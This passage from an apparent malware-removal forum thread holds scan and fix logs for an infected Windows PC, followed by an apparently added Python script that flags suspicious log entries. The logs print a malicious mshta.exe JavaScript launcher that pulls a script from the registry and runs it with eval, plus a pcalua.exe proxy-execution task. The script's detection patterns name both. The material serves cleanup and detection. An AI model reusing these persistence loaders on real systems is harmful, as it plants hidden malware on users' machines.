R3 VASDeviceDrm; C:\Windows\system32\drivers\vasdDev.sys [1454896 2012-03-19] (ShiningMorning Inc.)
R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2014-09-21] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2014-09-21] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2014-09-21] (Microsoft Corporation)
S4 hrlvm; System32\drivers\usbcmpvz.sys [X]
R3 knquxa; system32\drivers\qtxadh.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-06-12 20:35 - 2018-06-12 20:35 - 000000000 ____D C:\Users\Dan\AppData\Local\iabokse
2018-06-12 20:33 - 2018-06-12 20:33 - 000142672 ____N C:\Windows\system32\Drivers\cooybehl.sys
2018-06-12 20:13 - 2018-06-12 20:13 - 000000000 ____D C:\Users\Dan\AppData\Local\sietnkv
2018-06-11 23:07 - 2018-06-11 23:07 - 000000077 _____ C:\Users\Dan\AppData\Local\smplayerhdpi.ini
2018-06-11 21:38 - 2018-06-11 21:38 - 000000000 ____D C:\Users\Dan\AppData\Local\vsdkhmb
2018-06-11 21:17 - 2018-06-11 21:17 - 000000000 ____D C:\Users\Dan\AppData\Local\cwkbude
2018-06-11 20:54 - 2018-06-11 20:54 - 000000000 ____D C:\Users\Dan\AppData\Local\ianhgkz
2018-06-11 20:14 - 2018-06-11 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\spnamrh
2018-06-10 20:19 - 2018-06-10 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\wdhvpka
2018-06-09 19:36 - 2018-06-09 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\psnwzov
2018-06-08 20:22 - 2018-06-08 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\sprxnmw
2018-06-07 20:25 - 2018-06-07 20:25 - 000000000 ____D C:\Users\Dan\AppData\Local\zaothbn
2018-06-06 20:16 - 2018-06-06 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\upcnzih
2018-06-05 20:19 - 2018-06-05 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\wdavblr
2018-06-04 20:46 - 2018-06-04 20:46 - 000000000 ____D C:\Users\Dan\AppData\Local\upmrihe
2018-06-04 20:15 - 2018-06-04 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\widgtzk
2018-06-03 20:18 - 2018-06-03 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\msapgde
2018-06-02 19:42 - 2018-06-02 19:42 - 000000000 ____D C:\Users\Dan\AppData\Local\reepcgo
2018-06-01 20:21 - 2018-06-01 20:21 - 000000000 ____D C:\Users\Dan\AppData\Local\wmkxhrt
2018-05-31 20:24 - 2018-05-31 20:24 - 000000000 ____D C:\Users\Dan\AppData\Local\sinxrlt
2018-05-30 20:20 - 2018-05-30 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\mbiczhw
2018-05-29 20:47 - 2018-05-29 21:04 - 000003084 _____ C:\Windows\System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A}
2018-05-29 20:16 - 2018-05-29 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\avcsxeg
2018-05-28 20:16 - 2018-05-28 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\dtiroaw
2018-05-27 20:40 - 2018-05-27 20:40 - 000000146 _____ C:\Users\Dan\Desktop\Windows Defender - Shortcut.lnk
2018-05-27 20:12 - 2018-05-27 20:12 - 000000000 ____D C:\Users\Dan\AppData\Local\vdmbsup
2018-05-26 19:39 - 2018-05-26 19:39 - 000000000 ____D C:\Users\Dan\AppData\Local\cgkeslp
2018-05-25 20:18 - 2018-05-25 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\nimzwrx
2018-05-24 20:16 - 2018-05-24 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\svhznix
2018-05-23 23:10 - 2018-05-23 23:10 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ C:\Users\Dan\AppData\Local\recently-used.xbel
2018-05-23 20:16 - 2018-05-23 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\coeaubg
2018-05-22 20:15 - 2018-05-22 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\lsrgdch
2018-05-21 18:54 - 2018-05-21 18:54 - 000000000 ____D C:\Users\Dan\AppData\Local\tihexad
2018-05-20 19:05 - 2018-05-20 19:05 - 000000000 ____D C:\Users\Dan\AppData\Local\rtksgep
2018-05-19 19:36 - 2018-05-19 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\usbziol
2018-05-18 20:19 - 2018-05-18 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\mskiwue
2018-05-17 20:18 - 2018-05-17 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wictgzl
2018-05-16 20:14 - 2018-05-16 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\scdhbzo
2018-05-15 20:14 - 2018-05-15 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\dwczukm
2018-05-14 20:11 - 2018-05-14 20:11 - 000000000 ____D C:\Users\Dan\AppData\Local\wihnxoc
2018-05-13 20:26 - 2018-05-13 20:26 - 000000000 ____D C:\Users\Dan\AppData\Local\dwockil
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-06-12 20:45 - 2018-03-22 21:52 - 000000004 _____ C:\ProgramData\lock.dat
2018-06-12 20:43 - 2016-03-03 14:05 - 000000000 ____D C:\FRST
2018-06-12 20:40 - 2017-03-29 19:14 - 000000074 _____ C:\Users\Dan\AppData\Roaming\sp_data.sys
2018-06-12 20:37 - 2015-02-09 00:09 - 000000000 __RDO C:\Users\Dan\OneDrive
2018-06-12 20:37 - 2015-02-01 10:08 - 000000000 ____D C:\Users\Dan\AppData\Local\Adobe
2018-06-12 20:36 - 2015-11-12 20:24 - 000000000 ____D C:\ProgramData\VMware
2018-06-12 20:35 - 2018-03-22 21:53 - 000000000 ____D C:\Users\Dan\AppData\Local\aucozre
2018-06-12 20:35 - 2018-03-22 21:52 - 000000364 _____ C:\ProgramData\rwi.hhad
2018-06-12 20:34 - 2015-11-13 20:19 - 000000000 ____D C:\ProgramData\Gramblr
2018-06-12 20:34 - 2013-08-22 10:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-06-12 20:33 - 2018-03-22 21:52 - 002888704 _____ (TOSHIBA CORPORATION) C:\Windows\system32\avmhengsvc.exe
2018-06-12 20:33 - 2013-08-22 09:25 - 012582912 _____ C:\Windows\system32\config\HARDWARE
2018-06-12 20:33 - 2013-08-22 09:25 - 000524288 ___SH C:\Windows\system32\config\BBI
2018-06-11 23:07 - 2016-06-12 19:00 - 000000000 ____D C:\Users\Dan\.smplayer
2018-06-11 22:36 - 2016-07-05 19:49 - 000000000 ____D C:\ProgramData\boost_interprocess
2018-06-11 21:59 - 2013-08-22 11:36 - 000000000 ____D C:\Windows\system32\NDF
2018-06-10 22:57 - 2015-02-03 07:57 - 000000000 ____D C:\Users\Dan\AppData\Local\ocenaudio
2018-06-09 23:31 - 2015-02-05 08:20 - 000000000 ____D C:\Users\Dan\AppData\Roaming\vlc
2018-06-08 20:32 - 2013-08-22 09:36 - 000000000 ____D C:\Windows\Inf
2018-06-07 21:59 - 2016-08-26 20:21 - 000000000 ____D C:\Users\Dan\Documents\A - RESTORED FILES - DAN
2018-05-31 20:45 - 2016-07-18 13:30 - 000000000 ____D C:\Users\Dan\Desktop\Video & Various  Software Shortcuts
2018-05-29 22:18 - 2018-03-24 18:39 - 000000000 ____D C:\Users\Dan\AppData\Local\ElevatedDiagnostics
2018-05-29 21:19 - 2017-01-25 19:42 - 000000000 ____D C:\Windows\Minidump
2018-05-29 21:19 - 2016-03-07 20:08 - 000000000 ____D C:\Users\Dan\AppData\Local\CrashDumps
2018-05-29 21:04 - 2018-03-22 21:50 - 000003626 _____ C:\Windows\System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B}
2018-05-29 21:04 - 2018-03-22 21:50 - 000003424 _____ C:\Windows\System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3}
2018-05-29 21:04 - 2016-06-16 10:58 - 000003030 _____ C:\Windows\System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3}
2018-05-29 21:04 - 2015-02-11 20:37 - 000003378 _____ C:\Windows\System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8}
2018-05-29 21:04 - 2015-02-11 20:32 - 000003286 _____ C:\Windows\System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF}
2018-05-29 20:47 - 2018-03-22 21:51 - 000000000 ____D C:\Program Files (x86)\s5
2018-05-24 20:30 - 2014-03-18 05:47 - 001164886 _____ C:\Windows\system32\PerfStringBackup.INI
2018-05-23 21:13 - 2016-07-10 13:03 - 000000000 ____D C:\Users\Dan\AppData\Local\gtk-2.0
2018-05-23 21:13 - 2015-02-04 11:43 - 000000000 ____D C:\Users\Dan\.gimp-2.8
 
==================== Files in the root of some directories =======
 
2018-03-22 21:52 - 2018-06-12 20:45 - 000000004 _____ () C:\ProgramData\lock.dat
2018-03-23 18:46 - 2018-03-23 18:46 - 000267264 _____ () C:\ProgramData\TeamVieverService.dll
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\YuIeaAuVrYQ.exe
2018-03-22 21:50 - 2018-03-22 21:50 - 000481104 _____ (DriverPack) C:\Users\Dan\AppData\Roaming\DRP.exe
2017-03-29 19:14 - 2018-06-12 20:40 - 000000074 _____ () C:\Users\Dan\AppData\Roaming\sp_data.sys
2018-03-22 21:49 - 2018-03-22 21:49 - 000724992 _____ () C:\Users\Dan\AppData\Roaming\virtualexechange.exe
2018-03-22 21:49 - 2018-03-22 21:49 - 000000001 _____ () C:\Users\Dan\AppData\Roaming\w.txt
2015-02-02 09:28 - 2015-02-03 07:25 - 000000068 _____ () C:\Users\Dan\AppData\Roaming\WB.CFG
2015-01-25 12:12 - 2016-03-06 16:31 - 000000365 _____ () C:\Users\Dan\AppData\Roaming\WPLAEHX
2015-04-29 13:39 - 2015-04-29 13:39 - 000200331 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS
2015-04-29 13:39 - 2015-04-29 13:39 - 000000290 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS.part
2015-04-29 13:34 - 2015-04-29 13:34 - 000385602 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS
2015-04-29 13:34 - 2015-04-29 13:38 - 000000220 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS.part
2015-04-29 13:39 - 2015-04-29 13:39 - 000146145 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS
2015-04-29 13:39 - 2015-04-29 13:39 - 000000274 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS.part
1623-04-04 13:03 - 1623-04-04 13:03 - 000192512 ____N (Microsoft Corporation) C:\Users\Dan\AppData\Local\agjCu.exe
2015-09-05 13:42 - 2016-04-20 16:08 - 000017920 _____ () C:\Users\Dan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ () C:\Users\Dan\AppData\Local\recently-used.xbel
2018-06-11 23:07 - 2018-06-11 23:07 - 000000077 _____ () C:\Users\Dan\AppData\Local\smplayerhdpi.ini
2018-03-22 21:50 - 2018-03-22 21:50 - 000000003 _____ () C:\Users\Dan\AppData\Local\wbem.ini
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
C:\Windows\system32\drivers\cooybehl.sys -> Access Denied <======= ATTENTION
 
LastRegBack: 2018-05-29 22:18
 
==================== End of FRST.txt ============================


#30 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 13 June 2018 - 06:10 PM

Here's the Fixlog.txt

Fix result of Farbar Recovery Scan Tool (x64) Version: 06.06.2018 01
Ran by Dan (12-06-2018 20:31:27) Run:2
Running from D:\
Loaded Profiles: Dan (Available Profiles: Dan)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
C:\ProgramData\dahhService\
R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()
C:\Users\Dan\AppData\Local\aucozre\
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
AppInit_DLLs-x32: C:\ProgramData\TeamVieverService.dll => C:\ProgramData\TeamVieverService.dll [267264 2018-03-23] ()
C:\ProgramData\TeamVieverService.dll
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-07] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-07] (Oracle Corporation)
FF Extension: (Quick Searcher) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-03-22]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\uxz090y6.default-1505963547810 [2018-05-29]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\jefccanc.Daniel-1506042165545 [2018-05-29]
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-07] (Oracle Corporation)
C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeofhjjmgagmjigkfgghbnjjeibokcik
S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION
C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha
C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha
C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm
C:\Program File (x86) ArcWelder - Android Simulator (Google Chrome) - Instagram\com.instagram.android.apk_export_eznre
HKLM\SYSTEM\CurrentControlSet\Services\eubtvna <==== ATTENTION (Rootkit!)
C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\
R2 9b2582d4a23748e2d93e755c9fbf7de5; C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll [2150400 2018-03-22] () [File not signed]
2018-03-22 21:52 - 2018-03-22 21:52 - 002150400 _____ () C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll
R1 6bbfa1b48d3fadbf9e2e973e703b29a9; C:\Windows\system32\drivers\6bbfa1b48d3fadbf9e2e973e703b29a9.sys [79776 2018-03-22] ()
R3 ehkoru; system32\drivers\knruxb.sys [X]
S4 hrlvm; System32\drivers\usbcmpvz.sys [X]
2018-05-30 23:23 - 2018-05-30 23:23 - 000142672 ____N C:\Windows\system32\Drivers\cooeilos.sys
2018-05-31 20:24 - 2018-03-22 21:52 - 000000292 _____ C:\ProgramData\rwi.hhad
C:\Users\Dan\AppData\Roaming\sp_data.sys
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\YuIeaAuVrYQ.exe
2018-03-22 21:49 - 2018-03-22 21:49 - 000724992 _____ () C:\Users\Dan\AppData\Roaming\virtualexechange.exe
2018-03-22 21:49 - 2018-03-22 21:49 - 000000001 _____ () C:\Users\Dan\AppData\Roaming\w.txt
2015-01-25 12:12 - 2016-03-06 16:31 - 000000365 _____ () C:\Users\Dan\AppData\Roaming\WPLAEHX
1623-04-04 13:03 - 1623-04-04 13:03 - 000192512 ____N (Microsoft Corporation) C:\Users\Dan\AppData\Local\agjCu.exe
C:\Windows\system32\drivers\cooeilos.sys -> Access Denied <======= ATTENTION
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ChromeHTML: ->  <==== ATTENTION
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION
C:\Windows\system32\mshta.exe
Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe
C:\Windows\986246e4d4365334c49f584d3435ca41.exe
Task: {933A0EAA-67D1-40AD-8272-FE777ED5D1C2} - System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3} => C:\Program Files (x86)\pAuZbg.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
C:\Program Files (x86)\pAuZbg.exe
Task: {97F7FC31-B27F-47F6-A95A-B187E18672B2} - System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B} => C:\Program Files (x86)\YuIeaAuVrYQ.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
C:\Program Files (x86)\YuIeaAuVrYQ.exe
Task: {FBF83420-4969-4297-B1AF-91B1C6329E4F} - System32\Tasks\6320c4d4d9492959f6f8b43b8fdbf2f5 => sc start 6320c4d4d9492959f6f8b43b8fdbf2f5 <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [139]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSw8 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ColorMedia => ""="service"
FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) ??????????????????????
FirewallRules: [{96606CA1-E101-4434-AE0C-6C99B774D1CA}] => (Allow) ??????????????????????e
FirewallRules: [{814CAEF2-ADD6-4507-BAE2-55F6820A7994}] => (Allow) ????????????????????????????
FirewallRules: [{0E3753F1-E381-437A-BC70-0B47ECA113FA}] => (Allow) ????????????????????????????e
C:\Program Files (x86)\s5
R3 knquxa; system32\drivers\qtxadh.sys [X]
2018-06-04 20:42 - 2018-06-04 20:42 - 000142672 ____N C:\Windows\system32\Drivers\cooorvyb.sys
2018-06-04 20:59 - 2018-03-22 21:52 - 000000004 _____ C:\ProgramData\lock.dat
 
 
*****************
 
 
==== End of Fixlog 20:31:27 ====
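The two logs above are the poster's raw FRST output. As an added triage example (not part of FRST, of the fixlist, or of anything posted in this thread), the Python below encodes the heuristics an analyst reads such a log with and runs them over lines copied from the FRST.txt and Fixlog.txt above: 32-hex-digit names, services with no vendor or sitting in user-writable paths, orphaned `[X]` registrations, file dates before 1980, the `mshta.exe "javascript:..."` registry launcher, a scheduled task that proxies through `pcalua.exe`, SafeBoot service registrations, a Defender policy restriction, and a driver file the tool could not read. The tag names and the 1980 cut-off are this script's own assumptions, not FRST terminology.

```python
"""Heuristic triage of FRST (Farbar Recovery Scan Tool) log lines.

Added example for this thread; not FRST code and not part of the posted fix.
SAMPLE holds lines copied from the FRST.txt / Fixlog.txt posted above. The tag
names are this script's own labels (assumption), not FRST's.
"""
import re
from collections import Counter

# 32 contiguous hex digits, e.g. 6320c4d4d9492959f6f8b43b8fdbf2f5 (MD5-style random name)
HEX32 = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{32}(?![0-9a-fA-F])")
# Service/driver lines: "R2 name; path [size date] (vendor) [flags]"
SVC_LINE = re.compile(r"^[RSU]\d (?P<name>[^;]+); (?P<rest>.+)$")
# File lines open with "created - modified" timestamps
FILE_LINE = re.compile(r"^(\d{4})-\d\d-\d\d \d\d:\d\d - (\d{4})-\d\d-\d\d \d\d:\d\d - ")
# "[1623-04-04]" style dates FRST appends to task targets
BRACKET_DATE = re.compile(r"\[(\d{4})-\d\d-\d\d\]")
EMPTY_VENDOR = re.compile(r"\(\s*\)")
USER_WRITABLE = re.compile(r"\\(ProgramData|Users\\[^\\]+\\AppData)\\", re.I)
# Assumption: no Windows file was legitimately written before the FAT epoch (1980);
# an earlier date means a forged or malformed timestamp.
PLAUSIBLE_MIN_YEAR = 1980


def triage_line(line: str) -> list[str]:
    """Return the heuristic tags that fire on one log line (empty list if none)."""
    tags = []
    low = line.lower()
    if "mshta.exe" in low and "javascript:" in low:
        tags.append("mshta-javascript-launcher")  # script body is read from the registry and eval'd
    if "pcalua.exe -a" in low:
        tags.append("pcalua-proxy-execution")  # Program Compatibility Assistant used as a launcher
    if "\\safeboot\\" in low:
        tags.append("safeboot-persistence")  # component registered to start in Safe Mode too
    if "windows defender: restriction" in low:
        tags.append("defender-disabled-by-policy")
    if "[x]" in low:
        tags.append("orphaned-entry")  # registration left behind after its file disappeared
    if "access denied" in low:
        tags.append("unreadable-driver-file")  # a running component shielding its own image
    if HEX32.search(line):
        tags.append("hash-like-name")
    svc = SVC_LINE.match(line)
    if svc:
        rest = svc.group("rest")
        if EMPTY_VENDOR.search(rest):
            tags.append("no-vendor")
        if USER_WRITABLE.search(rest):
            tags.append("service-in-user-writable-path")
    years = []
    f = FILE_LINE.match(line)
    if f:
        years += [int(y) for y in f.groups()]
    years += [int(y) for y in BRACKET_DATE.findall(line)]
    if any(y < PLAUSIBLE_MIN_YEAR for y in years):
        tags.append("impossible-timestamp")
    return tags


def triage(lines):
    """Return (line, tags) for every line that trips at least one heuristic."""
    hits = []
    for ln in lines:
        tags = triage_line(ln)
        if tags:
            hits.append((ln, tags))
    return hits


def tag_counts(lines) -> Counter:
    """How often each tag fires across the log; a quick picture of the infection's shape."""
    return Counter(t for _, tags in triage(lines) for t in tags)


# Lines copied from the logs posted in this thread (two clean lines included as controls).
SAMPLE = r'''
S2 6320c4d4d9492959f6f8b43b8fdbf2f5; C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\890117e400ab1707a9d681317614c87e.exe [1795584 2018-03-22] () [File not signed] <==== ATTENTION
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)
R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()
S4 hrlvm; System32\drivers\usbcmpvz.sys [X]
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe
2018-06-11 23:07 - 2018-06-11 23:07 - 000000077 _____ C:\Users\Dan\AppData\Local\smplayerhdpi.ini
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION
Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"
C:\Windows\system32\drivers\cooybehl.sys -> Access Denied <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
'''.strip().splitlines()


if __name__ == "__main__":
    for line, tags in triage(SAMPLE):
        print(", ".join(tags).ljust(50), line[:90])
    print(dict(tag_counts(SAMPLE)))
```

The tags are triage hints, not verdicts: the Adobe service and the smplayer ini pass clean, while the `mshta.exe` entry is the one item in the list that no file deletion alone would have removed, because the loader body lives in `HKCU\software\wsfl\nfhvb` and is pulled back with `RegRead` and `eval` each time the handler fires, which is why the fixlist above targets both the registry key and `mshta.exe` itself. The "One Month Created" list shows the same idea from the other side: a new seven-letter folder under `AppData\Local` almost every evening at about 20:15, the cadence of a scheduled re-creation rather than of anything a user did.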




